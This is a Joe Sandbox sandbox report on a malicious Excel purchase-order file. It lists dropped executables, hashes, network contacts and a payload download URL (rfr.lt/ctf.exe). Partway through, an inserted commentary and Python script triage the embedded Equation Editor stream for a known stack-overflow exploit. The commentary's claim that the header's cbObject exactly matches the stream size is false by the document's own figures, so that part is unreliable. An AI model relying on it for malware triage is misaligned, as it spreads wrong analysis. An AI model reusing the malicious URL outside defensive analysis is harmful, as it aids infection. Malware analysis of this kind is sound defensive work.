          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | false | | high
          http://java.sun.com | explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | word.exe, word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmp | false | | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmp | false | | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea | explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp | false | | high
          http://www.piriform.com/ccleanerK | explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp | false | | high
          http://investor.msn.com/ | explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469131172.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.479966015.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.488819431.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.507699566.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmp | false | | high
          http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
          http://www.%s.comPA | word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
          http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | false | | high
          https://support.mozilla.org | explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | false | | high
          http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.507160581.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.673859564.0000000001CF0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                            Contacted IPs

                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
198.54.117.212 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
91.203.68.162 | rfr.lt | Latvia | 43513 | NANO-ASLV | true

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:553050
                                            Start date:14.01.2022
                                            Start time:08:03:53
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 55s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:HME AG PO 2091.xlsx
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winXLSX@9/9@3/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 46.5% (good quality ratio 41.4%)
                                            • Quality average: 70.9%
                                            • Quality standard deviation: 33.4%
                                            HCA Information:
                                            • Successful, ratio: 87%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xlsx
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Active ActiveX Object
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
08:05:40 | API Interceptor | 60x Sleep call for process: EQNEDT32.EXE modified
08:05:45 | API Interceptor | 85x Sleep call for process: word.exe modified
08:06:12 | API Interceptor | 229x Sleep call for process: cscript.exe modified
08:07:04 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:downloaded
                                            Size (bytes):248302
                                            Entropy (8bit):7.927911380419802
                                            Encrypted:false
                                            SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                                            MD5:8EDDCC35719034649F6947B2B08BCDF3
                                            SHA1:5506B69B4584F43232F45299192A540EC0197998
                                            SHA-256:0D072A60B433F330D2BA97D75EAE7AF07E9D75BC6ED5B1065287661D05E82AB6
                                            SHA-512:C7716DAAFFFD44DFF6143D7FE0FB686EB5FC08DA918AAB204AE6D7C8687DC914D9310D488A2FFC4767E5FD643E8AEE6D88FADF28D156C6BE731C29BCC3943681
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 42%
                                            Reputation:low
                                            IE Cache URL:http://rfr.lt/ctf.exe
                                            C:\Users\user\AppData\Local\Temp\5C24.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.1464700112623651
                                            Encrypted:false
                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                            MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                            SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                            SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                            SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            C:\Users\user\AppData\Local\Temp\nskF75B.tmp
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252172
                                            Entropy (8bit):7.750682379260983
                                            Encrypted:false
                                            SSDEEP:6144:118MKS5foIrwbBl2/IO4cwyjICBga9xtqS+W:0MKS5pwdQIC99xtqA
                                            MD5:8644B9AA55DCA97B4841D7C3878444C7
                                            SHA1:1B7CD31D5C9509868830982D39D9A3F75B7E3AD4
                                            SHA-256:C41772CB8BD860959A61F832E221F9DC634BEBD8FE4CD141E45321E348EB4181
                                            SHA-512:2DEE50DCEDF000EC57222C3D12B30F7905B18977C929C14517A0DC2937DA7B6CFF0D7FBB093059AE5607AB3C3341C856FEACD4CFAC23C89F20EBBFD50B174513
                                            Malicious:false
                                            Reputation:low
                                            C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):4608
                                            Entropy (8bit):3.8072208508576035
                                            Encrypted:false
                                            SSDEEP:24:e31GSNNCc0teIAUdax/+TCA5dieD4ueeDFE8hueeYoNXs+f3SlLRQ0K7ABPnRuVL:CnC/I9GTxieBJInFbfGFN1RuqS
                                            MD5:D62257B9F46BB3ECC454D94B80E839E8
                                            SHA1:A33070571B7909CEB589F9CCEB8591EE2DAE5C9F
                                            SHA-256:9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
                                            SHA-512:065531AFC2DA7DD6CECC893C13E41A1F15E0FC670E0DDC006E6F87CF5CB7A9B94D36275D2050953A11350590AC4D1B1B5FB89ACAA3C6B1F3F6C466D5E155F907
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Reputation:low
                                            C:\Users\user\AppData\Local\Temp\pawgjsvu
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4769
                                            Entropy (8bit):6.209190395428905
                                            Encrypted:false
                                            SSDEEP:96:/s3+C1lu78g/85QphY5tVXUcbaLrVJ83Z/Lj+HNdC+cR3Sc3owy8WwXfUE/gmc01:i+CW8Q85ghY5tVkcbkU3hFdowyPwPUEX
                                            MD5:2CF23E8F99E539C2CFA7DF0709FFE950
                                            SHA1:B0DEF49E4CA1DE39D60696FFEC5EC6ECB9399D3C
                                            SHA-256:C71C94E4AA37C19EE3E62E4F20D03CE4950D9B7BCA8755B3729CBDB7897B6FDE
                                            SHA-512:0A028931CFE2F89C9324BA125DDFE576051CE68AFE556700D89EB74F0EC19DDBE1AB2C2E7AE96523CE231B47A18E5DB4935EF22E68F8708BC7663060F888D11E
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\zn2eyxxq9ww5zrdhr
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):220020
                                            Entropy (8bit):7.992864927984938
                                            Encrypted:true
                                            SSDEEP:6144:7MKS5foIrwbBl2/IO4cwyjICBga9xtqS+Wx:7MKS5pwdQIC99xtqAx
                                            MD5:A75D055E6FABC0D24984208FC2BD8877
                                            SHA1:F4071D8B3141A30FC0D70787D174B8E31C6131FC
                                            SHA-256:6497E85685A07951F80AE543BB730D7714717596140569E4D5C9388F2E6CBE59
                                            SHA-512:3A09EEF95C13AF84D71512DBFCDB2C6D87412844443411E2235E47797E9582A12FEA44848E1037B7C56C60E233CC2EA962E59BEE917F13C60103B2B196A51F4E
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\~DFAA19AC2D561A69CF.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1990656
                                            Entropy (8bit):7.565866635417304
                                            Encrypted:false
                                            SSDEEP:24576:YUyu6LATngkM1BqE6ENZWqlwRNXbQygHHDryOuXrl1VWgVf+Yw4y0rX+6auOUfC/:M8nMv6UZPwjeHHDrWF/i
                                            MD5:C60F89896570C0CB452EBE99B7C9971D
                                            SHA1:3853521B72EA0DAA20E7A08501E0F4BFA662E3A6
                                            SHA-256:4CEE33390C4B63D48FCEA2C1E6B876C7321F37260E2A8D411F82C31D2B525184
                                            SHA-512:06DF0523E5F1DCA5BBC5B1E23DA559283E4586FBD928451C2048095519EE77853D1BC3EB8B563834F52991CECC0D758DDFB68E2B0BB1FBDABFBDF32DFE30E086
                                            Malicious:false
                                            C:\Users\user\AppData\Roaming\word.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:dropped
                                            Size (bytes):248302
                                            Entropy (8bit):7.927911380419802
                                            Encrypted:false
                                            SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                                            MD5:8EDDCC35719034649F6947B2B08BCDF3
                                            SHA1:5506B69B4584F43232F45299192A540EC0197998
                                            SHA-256:0D072A60B433F330D2BA97D75EAE7AF07E9D75BC6ED5B1065287661D05E82AB6
                                            SHA-512:C7716DAAFFFD44DFF6143D7FE0FB686EB5FC08DA918AAB204AE6D7C8687DC914D9310D488A2FFC4767E5FD643E8AEE6D88FADF28D156C6BE731C29BCC3943681
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 42%
                                            C:\Users\user\Desktop\~$HME AG PO 2091.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                            Static File Info

                                            General

                                            File type:Microsoft Excel 2007+
                                            Entropy (8bit):7.998345830581208
                                            TrID:
                                            • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                            • ZIP compressed archive (8000/1) 16.67%
                                            File name:HME AG PO 2091.xlsx
                                            File size:1703303
                                            MD5:29ee298412e6d2cb968a883563837cbe
                                            SHA1:7ed1c5713ba7ff23e36fecdedb0f0c012f6c647b
                                            SHA256:22355ce0bfc092836a0d62f6cbb54d03aa6fb26091ecd1907922fb9f6e0d0880
                                            SHA512:fd26d093d6d2fd9885b1133033642e1a4c740c0070e8ba4d35b15ed0d95b22b92cd20db4b24e95fb9efccc125ff6a8a384efde15cdb39fbaec6e1a3ac3989627
                                            SSDEEP:24576:VWyA6LUTngoM3BYC6uNjO6tqRjtLQegHH/vyG+XNphn9dMpVlRkiSVcOy12HaLMp:PQhMD6ejFqToHH/vchn9dKjSVcdHLMp

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OpenXML
                                            Number of OLE Files:1

                                            OLE File "/opt/package/joesandbox/database/analysis/553050/sample/HME AG PO 2091.xlsx"

                                            Indicators

                                            Has Summary Info:False
                                            Application Name:unknown
                                            Encrypted Document:False
                                            Contains Word Document Stream:
                                            Contains Workbook/Book Stream:
                                            Contains PowerPoint Document Stream:
                                            Contains Visio Document Stream:
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:False

                                            Summary

                                            Author:HP
                                            Last Saved By:HP
                                            Create Time:2021-09-22T12:07:42Z
                                            Last Saved Time:2021-09-22T12:08:47Z
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Thumbnail Scaling Desired:false
                                            Contains Dirty Links:false
                                            Shared Document:false
                                            Changed Hyperlinks:false
                                            Application Version:12.0000

                                            Streams

                                            Stream Path: Equation Native, File Type: data, Stream Size: 1973002
                                            General
                                            Stream Path:Equation Native
                                            File Type:data
                                            Stream Size:1973002
                                            Entropy:7.56041819835
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . ! K . . . . . @ . K v . Q ] . . . . . . . . . . . . . . . . . . . . . W . . . Z . M " . E . . ( . . . t . . . , . . j . . U . . . S < u . - . . e . . . ` . B . h . . 0 . < $ . . K K q 9 . . . . . e . . t : > . . . G . . | . M t U D 5 T . D o . . . . . K . i . . . . f u . = e . . | . y I [ a . . j . e I . . . . q . } . . K . E ] . 3 . b . o . . } h 5 . C . , . . . [ e . . . z 5 . . & H a . . k ` 3 9 V . 6 . . . . . . . . . . . d q . . . . . + . H . v t . G . Y . . 2 . . . . . . @ j . o . . .
                                            Data Raw:1c 00 f8 06 00 00 21 4b ee 1a 1e 00 83 40 ee 4b 76 ac 51 5d e0 09 f0 12 fc e1 1f 18 03 13 01 0f cf 0a 01 08 92 7f bd cf bd 57 d1 81 e5 5a fd 4d 22 8b 45 f2 8b 28 b9 84 86 74 95 81 c1 2c e1 d1 6a 8b 11 55 ff d2 05 53 3c 75 a6 2d e6 08 65 a6 ff e0 60 dc 42 00 68 18 06 30 0b 3c 24 c8 06 4b 4b 71 39 8e 20 e3 81 f2 bc 65 d8 d6 74 3a 3e ee c9 16 47 1b a6 7c 8a 4d 74 55 44 35 54 87 44 6f
                                            Stream Path: K8TC1, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:K8TC1
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
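The Equation Native stream listed above is the object Excel hands to EQNEDT32.EXE, and three of its fields already argue for an exploit rather than a formula: a 1,973,002-byte stream where a genuine equation occupies a few hundred bytes, a byte entropy of 7.56 (packed or encrypted content), and, inside the MTEF data that follows the 28-byte EQNOLEFILEHDR, a FONT record whose name runs for 47 bytes before its terminating null. An overlong FONT name is the trigger shape of CVE-2017-11882, the stack overflow in Equation Editor's FONT record handler that the Sigma and behaviour signatures in this report point at. The Python below is a triage script added here as an example; it is not part of the Joe Sandbox report. It parses the EQNOLEFILEHDR, checks that cbObject agrees with the stream size, computes entropy and walks the MTEF records as far as the first FONT record. It runs on the 128 bytes of the stream the report prints under Data Raw (the rest of the stream is not on the page). The 36-byte buffer figure comes from public analyses of CVE-2017-11882 and the 64 KiB size limit is a heuristic chosen for the example; both are assumptions, not values from the report.

```python
"""Triage an Equation Editor 'Equation Native' OLE stream for CVE-2017-11882-style abuse."""
import math
import struct

# Constructed input: the first 128 bytes of the Equation Native stream exactly as the
# report prints them under "Data Raw". The full stream is 1,973,002 bytes long.
EQNATIVE_PREFIX = bytes.fromhex(
    "1c 00 f8 06 00 00 21 4b ee 1a 1e 00 83 40 ee 4b "
    "76 ac 51 5d e0 09 f0 12 fc e1 1f 18 03 13 01 0f "
    "cf 0a 01 08 92 7f bd cf bd 57 d1 81 e5 5a fd 4d "
    "22 8b 45 f2 8b 28 b9 84 86 74 95 81 c1 2c e1 d1 "
    "6a 8b 11 55 ff d2 05 53 3c 75 a6 2d e6 08 65 a6 "
    "ff e0 60 dc 42 00 68 18 06 30 0b 3c 24 c8 06 4b "
    "4b 71 39 8e 20 e3 81 f2 bc 65 d8 d6 74 3a 3e ee "
    "c9 16 47 1b a6 7c 8a 4d 74 55 44 35 54 87 44 6f "
)
REPORTED_STREAM_SIZE = 1973002

# EQNOLEFILEHDR, the 28-byte header Equation Editor writes in front of the MTEF data:
# WORD cbHdr, DWORD version, WORD cf (clipboard format), DWORD cbObject, 16 reserved bytes.
EQN_HDR = struct.Struct("<HIHI16s")

# MTEF v3 record types this walk handles. The size records carry no payload, a LINE
# record without option bits carries none either, and FONT is: tag, tface, style, name\0.
MTEF_LINE, MTEF_FONT = 1, 8
MTEF_SIZE_RECORDS = {10, 11, 12, 13, 14}       # FULL, SUB, SUB2, SYM, SUBSYM

# Assumed thresholds, not figures from the report: public analyses of CVE-2017-11882 put
# the stack buffer the FONT handler copies the name into at 0x24 bytes; the size limit
# is a deliberately generous heuristic, real equations are far smaller.
FONT_NAME_BUFFER = 36
MAX_SANE_STREAM_SIZE = 64 * 1024


def parse_eqn_header(stream):
    cb_hdr, version, cf, cb_object, _reserved = EQN_HDR.unpack_from(stream, 0)
    return {"cbHdr": cb_hdr, "version": version, "cf": cf, "cbObject": cb_object}


def shannon_entropy(data):
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def first_font_record(mtef):
    """Walk MTEF records after the 5-byte MTEF header up to the first FONT record.
    Returns None if an unhandled record type comes first, rather than guessing at its
    payload length. Offsets are relative to the start of the MTEF data."""
    pos = 5
    while pos < len(mtef):
        rtype, options = mtef[pos] & 0x0F, mtef[pos] >> 4
        if rtype == MTEF_FONT:
            name_start = pos + 3
            end = mtef.find(b"\x00", name_start)
            if end < 0:                      # truncated dump: the name runs off the end
                end = len(mtef)
            return {"offset": pos, "tface": mtef[pos + 1], "style": mtef[pos + 2],
                    "name": mtef[name_start:end], "name_len": end - name_start}
        if rtype in MTEF_SIZE_RECORDS or (rtype == MTEF_LINE and options == 0):
            pos += 1
            continue
        return None
    return None


def triage_equation_native(stream, stream_size):
    hdr = parse_eqn_header(stream)
    findings = []
    if hdr["cbHdr"] != EQN_HDR.size:
        findings.append("unexpected EQNOLEFILEHDR size %d" % hdr["cbHdr"])
    if hdr["cbObject"] != stream_size - hdr["cbHdr"]:
        findings.append("cbObject %d disagrees with the stream size" % hdr["cbObject"])
    if stream_size > MAX_SANE_STREAM_SIZE:
        findings.append("oversized Equation Native stream: %d bytes" % stream_size)
    font = first_font_record(stream[hdr["cbHdr"]:])
    if font and font["name_len"] > FONT_NAME_BUFFER:
        findings.append("FONT record name of %d bytes exceeds the %d-byte handler buffer"
                        % (font["name_len"], FONT_NAME_BUFFER))
    return {"header": hdr, "entropy": shannon_entropy(stream),
            "font": font, "findings": findings}


if __name__ == "__main__":
    result = triage_equation_native(EQNATIVE_PREFIX, REPORTED_STREAM_SIZE)
    print("header:", {k: hex(v) for k, v in result["header"].items()})
    print("entropy of the dumped prefix: %.2f" % result["entropy"])
    for finding in result["findings"]:
        print("FLAG:", finding)
```

On this sample the header parses cleanly (cbHdr 0x1c, cbObject 0x1e1aee, which is exactly the stream size minus 28), so the file is not malformed, it is simply carrying far more MTEF data than any equation needs, and the first FONT record already overruns the handler's buffer. To apply the same check to a real document, unzip the xlsx, open the embedded oleObject*.bin with olefile and read its "Equation Native" stream into the function in place of the constructed prefix.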

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            01/14/22-08:06:29.588785 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 23.227.38.74 | 192.168.2.22

                                            Network Port Distribution

                                            TCP Packets

                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Jan 14, 2022 08:05:05.696058035 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.748666048 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.748758078 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.749198914 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.800890923 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809087038 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809113026 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809134960 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809160948 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809176922 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.809207916 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.809223890 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809248924 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809278965 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809286118 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.809305906 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.809333086 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809340954 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.809365988 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809389114 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.809402943 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.809429884 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.820516109 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861282110 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861330986 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861365080 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861387968 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861432076 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861479044 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861498117 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861536026 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861572027 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861625910 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861638069 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861677885 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861710072 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861754894 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861776114 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861814022 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861867905 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861929893 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.861943007 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.861984968 CET | 49165 | 80 | 192.168.2.22 | 91.203.68.162
                                            Jan 14, 2022 08:05:05.862015009 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
                                            Jan 14, 2022 08:05:05.862068892 CET | 80 | 49165 | 91.203.68.162 | 192.168.2.22
